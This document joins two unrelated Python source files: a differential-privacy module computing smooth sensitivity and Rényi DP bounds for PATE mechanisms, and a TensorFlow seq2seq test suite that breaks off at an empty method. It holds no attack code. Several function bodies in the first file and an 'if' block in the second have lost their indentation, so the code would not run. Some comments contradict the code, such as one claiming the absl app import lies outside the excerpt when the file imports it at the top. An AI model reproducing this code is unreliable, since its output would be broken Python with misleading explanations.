# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Functions for smooth sensitivity analysis for PATE mechanisms.
This library implements functionality for doing smooth sensitivity analysis
for Gaussian Noise Max (GNMax), Threshold with Gaussian noise, and Gaussian
Noise with Smooth Sensitivity (GNSS) mechanisms.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import math
from absl import app
import numpy as np
import scipy
import sympy as sp
import core as pate
################################
# SMOOTH SENSITIVITY FOR GNMAX #
################################
# Global dictionary for storing cached q0 values keyed by (sigma, order).
_logq0_cache = {}

def _compute_logq0(sigma, order):
    """Memoized wrapper around compute_logq0_gnmax."""
    key = (sigma, order)
    if key not in _logq0_cache:
        # Cache miss: run the (expensive) root finding once per (sigma, order).
        _logq0_cache[key] = compute_logq0_gnmax(sigma, order)
    return _logq0_cache[key]
def _compute_logq1(sigma, order, num_classes):
    """Log of q1 = B_l(q0): the lower edge of the RDP plateau region."""
    logq0 = _compute_logq0(sigma, order)  # most likely already cached
    q1 = _compute_bl_gnmax(math.exp(logq0), sigma, num_classes)
    logq1 = math.log(q1)
    assert logq1 <= logq0  # B_l maps q0 downward by construction
    return logq1
def _compute_mu1_mu2_gnmax(sigma, logq):
# Computes mu1, mu2 according to Proposition 10.
mu2 = sigma * math.sqrt(-logq)
mu1 = mu2 + 1
return mu1, mu2
def _compute_data_dep_bound_gnmax(sigma, logq, order):
    """Data-dependent RDP bound from Theorem 6 (Appendix).

    Preconditions on logq are NOT checked here; the caller must compare
    logq against logq0 first.
    """
    mu1, mu2 = _compute_mu1_mu2_gnmax(sigma, logq)
    eps1 = mu1 / sigma**2
    eps2 = mu2 / sigma**2
    log1q = np.log1p(-math.exp(logq))  # log1q = log(1-q)
    term_a = (order - 1) * (
        log1q - (np.log1p(-math.exp((logq + eps2) * (1 - 1 / mu2)))))
    term_b = (order - 1) * (eps1 - logq / (mu1 - 1))
    # Stable log-sum-exp of the two weighted terms, renormalized by order-1.
    return np.logaddexp(log1q + term_a, logq + term_b) / (order - 1)
def _compute_rdp_gnmax(sigma, logq, order):
    """RDP of GNMax: data-dependent bound below q0, data-independent above."""
    if logq < _compute_logq0(sigma, order):
        return _compute_data_dep_bound_gnmax(sigma, logq, order)
    return pate.rdp_data_independent_gaussian(sigma, order)
def compute_logq0_gnmax(sigma, order):
    """Computes the point where we start using data-independent bounds.

    Args:
      sigma: std of the Gaussian noise
      order: Renyi order lambda

    Returns:
      logq0: the point above which the data-ind bound overtakes data-dependent
      bound.
    """

    def _check_validity_conditions(logq):
        # Function returns true iff logq is in the range where data-dependent bound
        # is valid. (Theorem 6 in Appendix.)
        mu1, mu2 = _compute_mu1_mu2_gnmax(sigma, logq)
        if mu1 < order:
            return False
        eps2 = mu2 / sigma**2
        # Do computation in the log space. The condition below comes from Lemma 9
        # from Appendix.
        return (logq <= (mu2 - 1) * eps2 - mu2 * math.log(mu1 / (mu1 - 1) * mu2 /
                                                          (mu2 - 1)))

    def _compare_dep_vs_ind(logq):
        # Positive when the data-dependent bound exceeds the data-independent one.
        return (_compute_data_dep_bound_gnmax(sigma, logq, order) -
                pate.rdp_data_independent_gaussian(sigma, order))

    # Natural upper bounds on q0.
    logub = min(-(1 + 1. / sigma)**2, -((order - .99) / sigma)**2, -1 / sigma**2)
    assert _check_validity_conditions(logub)

    # If data-dependent bound is already better, we are done already.
    if _compare_dep_vs_ind(logub) < 0:
        return logub

    # Identifying a reasonable lower bound to bracket logq0.
    loglb = 2 * logub  # logub is negative, and thus loglb < logub.
    while _compare_dep_vs_ind(loglb) > 0:
        assert loglb > -10000, "The lower bound on q0 is way too low."
        loglb *= 1.5

    # Root of the difference function is exactly the crossover point logq0.
    logq0, r = scipy.optimize.brentq(
        _compare_dep_vs_ind, loglb, logub, full_output=True)
    assert r.converged, "The root finding procedure failed to converge."
    assert _check_validity_conditions(logq0)  # just in case.
    return logq0
def _compute_bl_gnmax(q, sigma, num_classes):
return ((num_classes - 1) / 2 * scipy.special.erfc(
1 / sigma + scipy.special.erfcinv(2 * q / (num_classes - 1))))
def _compute_bu_gnmax(q, sigma, num_classes):
return min(1, (num_classes - 1) / 2 * scipy.special.erfc(
-1 / sigma + scipy.special.erfcinv(2 * q / (num_classes - 1))))
def _compute_local_sens_gnmax(logq, sigma, num_classes, order):
  """Implements Algorithm 3 (computes an upper bound on local sensitivity).

  (See Proposition 13 for proof of correctness.)
  """
  logq0 = _compute_logq0(sigma, order)
  logq1 = _compute_logq1(sigma, order, num_classes)
  # Within the plateau [logq1, logq0] the sensitivity is evaluated at logq1.
  if logq1 <= logq <= logq0:
    logq = logq1

  q = math.exp(logq)
  beta = _compute_rdp_gnmax(sigma, logq, order)
  # RDP at the upper/lower neighboring probabilities of q.
  beta_up = _compute_rdp_gnmax(
      sigma, math.log(_compute_bu_gnmax(q, sigma, num_classes)), order)
  beta_down = _compute_rdp_gnmax(
      sigma, math.log(_compute_bl_gnmax(q, sigma, num_classes)), order)
  return max(beta_up - beta, beta - beta_down)
def compute_local_sensitivity_bounds_gnmax(votes, num_teachers, sigma, order):
  """Computes a list of max-LS-at-distance-d for the GNMax mechanism.

  A more efficient implementation of Algorithms 4 and 5 working in time
  O(teachers*classes). A naive implementation is O(teachers^2*classes) or worse.

  Args:
    votes: A numpy array of votes.
    num_teachers: Total number of voting teachers.
    sigma: Standard deviation of the Guassian noise.
    order: The Renyi order.

  Returns:
    A numpy array of local sensitivities at distances d, 0 <= d <= num_teachers.
  """
  num_classes = len(votes)  # Called m in the paper.

  logq0 = _compute_logq0(sigma, order)
  logq1 = _compute_logq1(sigma, order, num_classes)
  logq = pate.compute_logq_gaussian(votes, sigma)
  # Sensitivity inside the plateau [logq1, logq0]; it dominates all other
  # distances, so it is a valid default fill value for the result array.
  plateau = _compute_local_sens_gnmax(logq1, sigma, num_classes, order)

  res = np.full(num_teachers, plateau)

  # If we start inside the plateau, every distance d keeps the plateau value.
  if logq1 <= logq <= logq0:
    return res

  # Invariant: votes is sorted in the non-increasing order.
  votes = sorted(votes, reverse=True)

  res[0] = _compute_local_sens_gnmax(logq, sigma, num_classes, order)
  curr_d = 0
  go_left = logq > logq0  # Otherwise logq < logq1 and we go right.

  # Iterate while the following is true:
  # 1. If we are going left, logq is still larger than logq0 and we may still
  #    increase the gap between votes[0] and votes[1].
  # 2. If we are going right, logq is still smaller than logq1.
  while ((go_left and logq > logq0 and votes[1] > 0) or
         (not go_left and logq < logq1)):
    curr_d += 1
    if go_left:  # Try decreasing logq: widen the lead of the top class.
      votes[0] += 1
      votes[1] -= 1
      idx = 1
      # Restore the invariant. (Can be implemented more efficiently by keeping
      # track of the range of indices equal to votes[1]. Does not seem to matter
      # for the overall running time.)
      while idx < len(votes) - 1 and votes[idx] < votes[idx + 1]:
        votes[idx], votes[idx + 1] = votes[idx + 1], votes[idx]
        idx += 1
    else:  # Go right, i.e., try increasing logq: shrink the lead.
      votes[0] -= 1
      votes[1] += 1  # The invariant holds since otherwise logq >= logq1.

    logq = pate.compute_logq_gaussian(votes, sigma)
    res[curr_d] = _compute_local_sens_gnmax(logq, sigma, num_classes, order)

  return res
##################################################
# SMOOTH SENSITIVITY FOR THE THRESHOLD MECHANISM #
##################################################
# Memo table of RDP vectors for the threshold mechanism, keyed by the 4-tuple
# (num_teachers, threshold, sigma, order).
_rdp_thresholds = {}


def _compute_rdp_list_threshold(num_teachers, threshold, sigma, order):
  """Returns RDP of the threshold mechanism for every vote count 0..num_teachers."""
  key = (num_teachers, threshold, sigma, order)
  cached = _rdp_thresholds.get(key)
  if cached is not None:
    return cached

  table = np.zeros(num_teachers + 1)
  for v in range(0, num_teachers + 1):
    # Log-probability that the noisy count of v votes clears the threshold.
    logp = scipy.stats.norm.logsf(threshold - v, scale=sigma)
    table[v] = pate.compute_rdp_threshold(logp, sigma, order)

  _rdp_thresholds[key] = table
  return table
def compute_local_sensitivity_bounds_threshold(counts, num_teachers, threshold,
                                               sigma, order):
  """Computes a list of max-LS-at-distance-d for the threshold mechanism.

  Args:
    counts: Vote counts (presumably a numpy array of per-class votes — confirm
      against callers); only the maximum count is used.
    num_teachers: Total number of voting teachers.
    threshold: The threshold parameter of the mechanism.
    sigma: Standard deviation of the Gaussian noise.
    order: The Renyi order.

  Returns:
    A numpy array of local sensitivity bounds at distances d = 0..num_teachers-1.
  """

  def _max_defined(*vals):
    # The original code relied on Python 2's max(x, None) == x. In Python 3
    # comparing a float with None raises TypeError, so filter Nones explicitly;
    # at least one value is always defined at every call site.
    return max(v for v in vals if v is not None)

  def _compute_ls(v):
    # Local sensitivity at vote count v: largest one-step change of the RDP
    # table around v (steps outside [0, num_teachers] are undefined).
    ls_step_up, ls_step_down = None, None
    if v > 0:
      ls_step_down = abs(rdp_list[v - 1] - rdp_list[v])
    if v < num_teachers:
      ls_step_up = abs(rdp_list[v + 1] - rdp_list[v])
    return _max_defined(ls_step_down, ls_step_up)

  cur_max = int(round(max(counts)))
  rdp_list = _compute_rdp_list_threshold(num_teachers, threshold, sigma, order)

  ls = np.zeros(num_teachers)
  for d in range(max(cur_max, num_teachers - cur_max)):
    # At distance d the maximum count can move to cur_max + d or cur_max - d;
    # take the worse of the two that stay within [0, num_teachers].
    ls_up, ls_down = None, None
    if cur_max + d <= num_teachers:
      ls_up = _compute_ls(cur_max + d)
    if cur_max - d >= 0:
      ls_down = _compute_ls(cur_max - d)
    ls[d] = _max_defined(ls_up, ls_down)
  return ls
#############################################
# PROCEDURES FOR SMOOTH SENSITIVITY RELEASE #
#############################################
# A global dictionary of exponentially decaying arrays. Indexed by beta.
dict_beta_discount = {}
def compute_discounted_max(beta, a):
n = len(a)
if beta not in dict_beta_discount or (len(dict_beta_discount[beta]) < n):
dict_beta_discount[beta] = np.exp(-beta * np.arange(n))
return max(a * dict_beta_discount[beta][:n])
def compute_smooth_sensitivity_gnmax(beta, counts, num_teachers, sigma, order):
  """Computes smooth sensitivity of a single application of GNMax.

  Args:
    beta: Smoothing parameter of the smooth-sensitivity definition.
    counts: Vote counts, forwarded to compute_local_sensitivity_bounds_gnmax.
    num_teachers: Total number of voting teachers.
    sigma: Standard deviation of the Gaussian noise.
    order: The Renyi order.

  Returns:
    The beta-smooth sensitivity: max over d of ls[d] * exp(-beta * d).
  """
  # BUG FIX: the original call passed (counts, sigma, order, num_teachers)
  # positionally, which does not match the callee's signature
  # compute_local_sensitivity_bounds_gnmax(votes, num_teachers, sigma, order).
  # Pass by keyword so the mapping is explicit and correct.
  ls = compute_local_sensitivity_bounds_gnmax(
      counts, num_teachers=num_teachers, sigma=sigma, order=order)
  return compute_discounted_max(beta, ls)
def compute_rdp_of_smooth_sensitivity_gaussian(beta, sigma, order):
  """Computes the RDP curve for the GNSS mechanism.

  Implements Theorem 23 (https://arxiv.org/pdf/1802.08908.pdf).

  Raises:
    ValueError: If beta > 0 and order is outside the open interval
      (1, 1 / (2 * beta)), where the theorem does not apply.
  """
  if beta > 0 and not 1 < order < 1 / (2 * beta):
    raise ValueError("Order outside the (1, 1/(2*beta)) range.")

  gaussian_term = order * math.exp(2 * beta) / sigma**2
  correction = (beta * order - .5 * math.log(1 - 2 * order * beta)) / (
      order - 1)
  return gaussian_term + correction
def compute_params_for_ss_release(eps, delta):
  """Computes sigma for additive Gaussian noise scaled by smooth sensitivity.

  Presently not used. (We proceed via RDP analysis.)

  Compute beta, sigma for applying Lemma 2.6 (full version of Nissim et al.) via
  Lemma 2.10.
  """
  # Rather than applying Lemma 2.10 directly, which would give suboptimal alpha,
  # (see http://www.cse.psu.edu/~ads22/pubs/NRS07/NRS07-full-draft-v1.pdf),
  # we extract a sufficient condition on alpha from its proof.
  #
  # Let a = rho_(delta/2)(Z_1). Then alpha is the positive root of
  # 2 * a * alpha + alpha^2 = eps / 2.
  gauss_quantile = scipy.special.ndtri(1 - delta / 2)
  alpha = math.sqrt(gauss_quantile**2 + eps / 2) - gauss_quantile
  chi2_quantile = scipy.special.chdtri(1, delta / 2)
  beta = eps / (2 * chi2_quantile)
  return alpha, beta
#######################################################
# SYMBOLIC-NUMERIC VERIFICATION OF CONDITIONS C5--C6. #
#######################################################
def _construct_symbolic_beta(q, sigma, order):
  """Builds a sympy expression for the data-dependent RDP bound beta(q)."""
  mu2 = sigma * sp.sqrt(sp.log(1 / q))
  mu1 = mu2 + 1
  eps1 = mu1 / sigma**2
  eps2 = mu2 / sigma**2
  term_a = (1 - q) / (1 - (q * sp.exp(eps2))**(1 - 1 / mu2))
  term_b = sp.exp(eps1) / q**(1 / (mu1 - 1))
  # Moment of the privacy loss; beta is its scaled logarithm.
  moment = (1 - q) * term_a**(order - 1) + q * term_b**(order - 1)
  return (1 / (order - 1)) * sp.log(moment)
def _construct_symbolic_bu(q, sigma, m):
  """Symbolic analogue of _compute_bu_gnmax (without clipping at 1)."""
  shifted = sp.erfcinv(2 * q / (m - 1)) - 1 / sigma
  return (m - 1) / 2 * sp.erfc(shifted)
def _is_non_decreasing(fn, q, bounds):
  """Verifies whether the function is non-decreasing within a range.

  Args:
    fn: Symbolic function of a single variable.
    q: The name of f's variable.
    bounds: Pair of (lower_bound, upper_bound) reals.

  Returns:
    True iff the function is non-decreasing in the range.
  """
  # Differentiate symbolically, then minimize the derivative numerically: the
  # function is non-decreasing iff the derivative's minimum is non-negative.
  derivative = sp.diff(fn, q)
  numeric_derivative = sp.lambdify(
      q,
      derivative,
      modules=[
          "numpy",
          {
              "erfc": scipy.special.erfc,
              "erfcinv": scipy.special.erfcinv,
          },
      ])
  result = scipy.optimize.minimize_scalar(
      numeric_derivative, bounds=bounds, method="bounded")
  assert result.success, "Minimizer failed to converge."
  return result.fun >= 0  # Check whether the derivative is non-negative.
def check_conditions(sigma, m, order):
  """Checks conditions C5 and C6 (Section B.4.2 in Appendix)."""
  q = sp.symbols("q", positive=True, real=True)

  beta = _construct_symbolic_beta(q, sigma, order)
  q0 = math.exp(compute_logq0_gnmax(sigma, order))
  cond5 = _is_non_decreasing(beta, q, (0, q0))

  if not cond5:
    # Condition 5 failed, so Condition 6 is not checked.
    return (cond5, False)

  bl_q0 = _compute_bl_gnmax(q0, sigma, m)
  bu = _construct_symbolic_bu(q, sigma, m)
  delta_beta = beta.subs(q, bu) - beta
  cond6 = _is_non_decreasing(delta_beta, q, (0, bl_q0))
  return (cond5, cond6)
def main(argv):
  # Placeholder entry point: the module is used as a library of routines and
  # does nothing when executed directly.
  del argv  # Unused.


if __name__ == "__main__":
  # app is presumably absl.app, imported outside this excerpt — confirm.
  app.run(main)
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for functional style sequence-to-sequence models."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import math
import random
import sys
# TODO: #6568 Remove this hack that makes dlopen() not crash.
if hasattr(sys, "getdlopenflags") and hasattr(sys, "setdlopenflags"):
import ctypes
sys.setdlopenflags(sys.getdlopenflags() | ctypes.RTLD_GLOBAL)
import numpy as np
from tensorflow.contrib.legacy_seq2seq.python.ops import seq2seq as seq2seq_lib
from tensorflow.contrib.rnn.python.ops import core_rnn
from tensorflow.contrib.rnn.python.ops import core_rnn_cell_impl
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import clip_ops
from tensorflow.python.ops import gradients_impl
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import nn_impl
from tensorflow.python.ops import rnn
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.training import adam
class Seq2SeqTest(test.TestCase):
  def testRNNDecoder(self):
    """rnn_decoder: 3 projected outputs of shape (2, 4); final state (2, 2)."""
    with self.test_session() as sess:
      with variable_scope.variable_scope(
          "root", initializer=init_ops.constant_initializer(0.5)):
        inp = [constant_op.constant(0.5, shape=[2, 2])] * 2
        _, enc_state = core_rnn.static_rnn(
            core_rnn_cell_impl.GRUCell(2), inp, dtype=dtypes.float32)
        dec_inp = [constant_op.constant(0.4, shape=[2, 2])] * 3
        # Project the size-2 GRU output up to size 4.
        cell = core_rnn_cell_impl.OutputProjectionWrapper(
            core_rnn_cell_impl.GRUCell(2), 4)
        dec, mem = seq2seq_lib.rnn_decoder(dec_inp, enc_state, cell)
        sess.run([variables.global_variables_initializer()])
        res = sess.run(dec)
        self.assertEqual(3, len(res))
        self.assertEqual((2, 4), res[0].shape)
        res = sess.run([mem])
        self.assertEqual((2, 2), res[0].shape)
  def testBasicRNNSeq2Seq(self):
    """basic_rnn_seq2seq: 3 outputs of shape (2, 4); final state (2, 2)."""
    with self.test_session() as sess:
      with variable_scope.variable_scope(
          "root", initializer=init_ops.constant_initializer(0.5)):
        inp = [constant_op.constant(0.5, shape=[2, 2])] * 2
        dec_inp = [constant_op.constant(0.4, shape=[2, 2])] * 3
        cell = core_rnn_cell_impl.OutputProjectionWrapper(
            core_rnn_cell_impl.GRUCell(2), 4)
        dec, mem = seq2seq_lib.basic_rnn_seq2seq(inp, dec_inp, cell)
        sess.run([variables.global_variables_initializer()])
        res = sess.run(dec)
        self.assertEqual(3, len(res))
        self.assertEqual((2, 4), res[0].shape)
        res = sess.run([mem])
        self.assertEqual((2, 2), res[0].shape)
  def testTiedRNNSeq2Seq(self):
    """tied_rnn_seq2seq (shared encoder/decoder weights): shapes as above."""
    with self.test_session() as sess:
      with variable_scope.variable_scope(
          "root", initializer=init_ops.constant_initializer(0.5)):
        inp = [constant_op.constant(0.5, shape=[2, 2])] * 2
        dec_inp = [constant_op.constant(0.4, shape=[2, 2])] * 3
        cell = core_rnn_cell_impl.OutputProjectionWrapper(
            core_rnn_cell_impl.GRUCell(2), 4)
        dec, mem = seq2seq_lib.tied_rnn_seq2seq(inp, dec_inp, cell)
        sess.run([variables.global_variables_initializer()])
        res = sess.run(dec)
        self.assertEqual(3, len(res))
        self.assertEqual((2, 4), res[0].shape)
        res = sess.run([mem])
        self.assertEqual(1, len(res))
        self.assertEqual((2, 2), res[0].shape)
  def testEmbeddingRNNDecoder(self):
    """embedding_rnn_decoder over int32 symbol inputs; LSTM tuple state out."""
    with self.test_session() as sess:
      with variable_scope.variable_scope(
          "root", initializer=init_ops.constant_initializer(0.5)):
        inp = [constant_op.constant(0.5, shape=[2, 2])] * 2
        cell_fn = lambda: core_rnn_cell_impl.BasicLSTMCell(2)
        cell = cell_fn()
        _, enc_state = core_rnn.static_rnn(cell, inp, dtype=dtypes.float32)
        dec_inp = [
            constant_op.constant(
                i, dtypes.int32, shape=[2]) for i in range(3)
        ]
        # Use a new cell instance since the attention decoder uses a
        # different variable scope.
        dec, mem = seq2seq_lib.embedding_rnn_decoder(
            dec_inp, enc_state, cell_fn(), num_symbols=4, embedding_size=2)
        sess.run([variables.global_variables_initializer()])
        res = sess.run(dec)
        self.assertEqual(3, len(res))
        self.assertEqual((2, 2), res[0].shape)
        res = sess.run([mem])
        self.assertEqual(1, len(res))
        self.assertEqual((2, 2), res[0].c.shape)
        self.assertEqual((2, 2), res[0].h.shape)
  def testEmbeddingRNNSeq2Seq(self):
    """embedding_rnn_seq2seq: tuple/non-tuple state, output projection, and
    feed_previous (both Tensor and Python bool) producing identical results."""
    with self.test_session() as sess:
      with variable_scope.variable_scope(
          "root", initializer=init_ops.constant_initializer(0.5)):
        enc_inp = [
            constant_op.constant(
                1, dtypes.int32, shape=[2]) for i in range(2)
        ]
        dec_inp = [
            constant_op.constant(
                i, dtypes.int32, shape=[2]) for i in range(3)
        ]
        cell_fn = lambda: core_rnn_cell_impl.BasicLSTMCell(2)
        cell = cell_fn()
        dec, mem = seq2seq_lib.embedding_rnn_seq2seq(
            enc_inp,
            dec_inp,
            cell,
            num_encoder_symbols=2,
            num_decoder_symbols=5,
            embedding_size=2)
        sess.run([variables.global_variables_initializer()])
        res = sess.run(dec)
        self.assertEqual(3, len(res))
        self.assertEqual((2, 5), res[0].shape)
        res = sess.run([mem])
        self.assertEqual((2, 2), res[0].c.shape)
        self.assertEqual((2, 2), res[0].h.shape)

        # Test with state_is_tuple=False.
        with variable_scope.variable_scope("no_tuple"):
          cell_nt = core_rnn_cell_impl.BasicLSTMCell(2, state_is_tuple=False)
          dec, mem = seq2seq_lib.embedding_rnn_seq2seq(
              enc_inp,
              dec_inp,
              cell_nt,
              num_encoder_symbols=2,
              num_decoder_symbols=5,
              embedding_size=2)
          sess.run([variables.global_variables_initializer()])
          res = sess.run(dec)
          self.assertEqual(3, len(res))
          self.assertEqual((2, 5), res[0].shape)
          res = sess.run([mem])
          # Concatenated (c, h) state: 2 * cell size.
          self.assertEqual((2, 4), res[0].shape)

        # Test externally provided output projection.
        w = variable_scope.get_variable("proj_w", [2, 5])
        b = variable_scope.get_variable("proj_b", [5])
        with variable_scope.variable_scope("proj_seq2seq"):
          dec, _ = seq2seq_lib.embedding_rnn_seq2seq(
              enc_inp,
              dec_inp,
              cell_fn(),
              num_encoder_symbols=2,
              num_decoder_symbols=5,
              embedding_size=2,
              output_projection=(w, b))
        sess.run([variables.global_variables_initializer()])
        res = sess.run(dec)
        self.assertEqual(3, len(res))
        # With an external projection the raw cell output (size 2) is returned.
        self.assertEqual((2, 2), res[0].shape)

        # Test that previous-feeding model ignores inputs after the first.
        dec_inp2 = [
            constant_op.constant(
                0, dtypes.int32, shape=[2]) for _ in range(3)
        ]
        with variable_scope.variable_scope("other"):
          d3, _ = seq2seq_lib.embedding_rnn_seq2seq(
              enc_inp,
              dec_inp2,
              cell_fn(),
              num_encoder_symbols=2,
              num_decoder_symbols=5,
              embedding_size=2,
              feed_previous=constant_op.constant(True))
        sess.run([variables.global_variables_initializer()])
        variable_scope.get_variable_scope().reuse_variables()
        d1, _ = seq2seq_lib.embedding_rnn_seq2seq(
            enc_inp,
            dec_inp,
            cell_fn(),
            num_encoder_symbols=2,
            num_decoder_symbols=5,
            embedding_size=2,
            feed_previous=True)
        d2, _ = seq2seq_lib.embedding_rnn_seq2seq(
            enc_inp,
            dec_inp2,
            cell_fn(),
            num_encoder_symbols=2,
            num_decoder_symbols=5,
            embedding_size=2,
            feed_previous=True)
        res1 = sess.run(d1)
        res2 = sess.run(d2)
        res3 = sess.run(d3)
        self.assertAllClose(res1, res2)
        self.assertAllClose(res1, res3)
  def testEmbeddingTiedRNNSeq2Seq(self):
    """embedding_tied_rnn_seq2seq: default, num_decoder_symbols, external
    projection, and feed_previous equivalence."""
    with self.test_session() as sess:
      with variable_scope.variable_scope(
          "root", initializer=init_ops.constant_initializer(0.5)):
        enc_inp = [
            constant_op.constant(
                1, dtypes.int32, shape=[2]) for i in range(2)
        ]
        dec_inp = [
            constant_op.constant(
                i, dtypes.int32, shape=[2]) for i in range(3)
        ]
        cell = functools.partial(
            core_rnn_cell_impl.BasicLSTMCell,
            2, state_is_tuple=True)
        dec, mem = seq2seq_lib.embedding_tied_rnn_seq2seq(
            enc_inp, dec_inp, cell(), num_symbols=5, embedding_size=2)
        sess.run([variables.global_variables_initializer()])
        res = sess.run(dec)
        self.assertEqual(3, len(res))
        self.assertEqual((2, 5), res[0].shape)
        res = sess.run([mem])
        self.assertEqual((2, 2), res[0].c.shape)
        self.assertEqual((2, 2), res[0].h.shape)

        # Test when num_decoder_symbols is provided, the size of decoder output
        # is num_decoder_symbols.
        with variable_scope.variable_scope("decoder_symbols_seq2seq"):
          dec, mem = seq2seq_lib.embedding_tied_rnn_seq2seq(
              enc_inp,
              dec_inp,
              cell(),
              num_symbols=5,
              num_decoder_symbols=3,
              embedding_size=2)
        sess.run([variables.global_variables_initializer()])
        res = sess.run(dec)
        self.assertEqual(3, len(res))
        self.assertEqual((2, 3), res[0].shape)

        # Test externally provided output projection.
        w = variable_scope.get_variable("proj_w", [2, 5])
        b = variable_scope.get_variable("proj_b", [5])
        with variable_scope.variable_scope("proj_seq2seq"):
          dec, _ = seq2seq_lib.embedding_tied_rnn_seq2seq(
              enc_inp,
              dec_inp,
              cell(),
              num_symbols=5,
              embedding_size=2,
              output_projection=(w, b))
        sess.run([variables.global_variables_initializer()])
        res = sess.run(dec)
        self.assertEqual(3, len(res))
        # With an external projection the raw cell output (size 2) is returned.
        self.assertEqual((2, 2), res[0].shape)

        # Test that previous-feeding model ignores inputs after the first.
        dec_inp2 = [constant_op.constant(0, dtypes.int32, shape=[2])] * 3
        with variable_scope.variable_scope("other"):
          d3, _ = seq2seq_lib.embedding_tied_rnn_seq2seq(
              enc_inp,
              dec_inp2,
              cell(),
              num_symbols=5,
              embedding_size=2,
              feed_previous=constant_op.constant(True))
        sess.run([variables.global_variables_initializer()])
        variable_scope.get_variable_scope().reuse_variables()
        d1, _ = seq2seq_lib.embedding_tied_rnn_seq2seq(
            enc_inp,
            dec_inp,
            cell(),
            num_symbols=5,
            embedding_size=2,
            feed_previous=True)
        d2, _ = seq2seq_lib.embedding_tied_rnn_seq2seq(
            enc_inp,
            dec_inp2,
            cell(),
            num_symbols=5,
            embedding_size=2,
            feed_previous=True)
        res1 = sess.run(d1)
        res2 = sess.run(d2)
        res3 = sess.run(d3)
        self.assertAllClose(res1, res2)
        self.assertAllClose(res1, res3)
  def testAttentionDecoder1(self):
    """attention_decoder with a single attention head."""
    with self.test_session() as sess:
      with variable_scope.variable_scope(
          "root", initializer=init_ops.constant_initializer(0.5)):
        cell_fn = lambda: core_rnn_cell_impl.GRUCell(2)
        cell = cell_fn()
        inp = [constant_op.constant(0.5, shape=[2, 2])] * 2
        enc_outputs, enc_state = core_rnn.static_rnn(
            cell, inp, dtype=dtypes.float32)
        # Stack the per-step encoder outputs into (batch, steps, output_size).
        attn_states = array_ops.concat([
            array_ops.reshape(e, [-1, 1, cell.output_size]) for e in enc_outputs
        ], 1)
        dec_inp = [constant_op.constant(0.4, shape=[2, 2])] * 3
        # Create a new cell instance for the decoder, since it uses a
        # different variable scope
        dec, mem = seq2seq_lib.attention_decoder(
            dec_inp, enc_state, attn_states, cell_fn(), output_size=4)
        sess.run([variables.global_variables_initializer()])
        res = sess.run(dec)
        self.assertEqual(3, len(res))
        self.assertEqual((2, 4), res[0].shape)
        res = sess.run([mem])
        self.assertEqual((2, 2), res[0].shape)
  def testAttentionDecoder2(self):
    """attention_decoder with two attention heads."""
    with self.test_session() as sess:
      with variable_scope.variable_scope(
          "root", initializer=init_ops.constant_initializer(0.5)):
        cell_fn = lambda: core_rnn_cell_impl.GRUCell(2)
        cell = cell_fn()
        inp = [constant_op.constant(0.5, shape=[2, 2])] * 2
        enc_outputs, enc_state = core_rnn.static_rnn(
            cell, inp, dtype=dtypes.float32)
        # Stack the per-step encoder outputs into (batch, steps, output_size).
        attn_states = array_ops.concat([
            array_ops.reshape(e, [-1, 1, cell.output_size]) for e in enc_outputs
        ], 1)
        dec_inp = [constant_op.constant(0.4, shape=[2, 2])] * 3
        # Use a new cell instance since the attention decoder uses a
        # different variable scope.
        dec, mem = seq2seq_lib.attention_decoder(
            dec_inp, enc_state, attn_states, cell_fn(),
            output_size=4, num_heads=2)
        sess.run([variables.global_variables_initializer()])
        res = sess.run(dec)
        self.assertEqual(3, len(res))
        self.assertEqual((2, 4), res[0].shape)
        res = sess.run([mem])
        self.assertEqual((2, 2), res[0].shape)
  def testDynamicAttentionDecoder1(self):
    """attention_decoder over dynamic_rnn encoder outputs (one head)."""
    with self.test_session() as sess:
      with variable_scope.variable_scope(
          "root", initializer=init_ops.constant_initializer(0.5)):
        cell_fn = lambda: core_rnn_cell_impl.GRUCell(2)
        cell = cell_fn()
        inp = constant_op.constant(0.5, shape=[2, 2, 2])
        enc_outputs, enc_state = rnn.dynamic_rnn(
            cell, inp, dtype=dtypes.float32)
        # dynamic_rnn already returns (batch, steps, output_size).
        attn_states = enc_outputs
        dec_inp = [constant_op.constant(0.4, shape=[2, 2])] * 3
        # Use a new cell instance since the attention decoder uses a
        # different variable scope.
        dec, mem = seq2seq_lib.attention_decoder(
            dec_inp, enc_state, attn_states, cell_fn(), output_size=4)
        sess.run([variables.global_variables_initializer()])
        res = sess.run(dec)
        self.assertEqual(3, len(res))
        self.assertEqual((2, 4), res[0].shape)
        res = sess.run([mem])
        self.assertEqual((2, 2), res[0].shape)
  def testDynamicAttentionDecoder2(self):
    """attention_decoder over dynamic_rnn encoder outputs (two heads)."""
    with self.test_session() as sess:
      with variable_scope.variable_scope(
          "root", initializer=init_ops.constant_initializer(0.5)):
        cell_fn = lambda: core_rnn_cell_impl.GRUCell(2)
        cell = cell_fn()
        inp = constant_op.constant(0.5, shape=[2, 2, 2])
        enc_outputs, enc_state = rnn.dynamic_rnn(
            cell, inp, dtype=dtypes.float32)
        # dynamic_rnn already returns (batch, steps, output_size).
        attn_states = enc_outputs
        dec_inp = [constant_op.constant(0.4, shape=[2, 2])] * 3
        # Use a new cell instance since the attention decoder uses a
        # different variable scope.
        dec, mem = seq2seq_lib.attention_decoder(
            dec_inp, enc_state, attn_states, cell_fn(),
            output_size=4, num_heads=2)
        sess.run([variables.global_variables_initializer()])
        res = sess.run(dec)
        self.assertEqual(3, len(res))
        self.assertEqual((2, 4), res[0].shape)
        res = sess.run([mem])
        self.assertEqual((2, 2), res[0].shape)
  def testAttentionDecoderStateIsTuple(self):
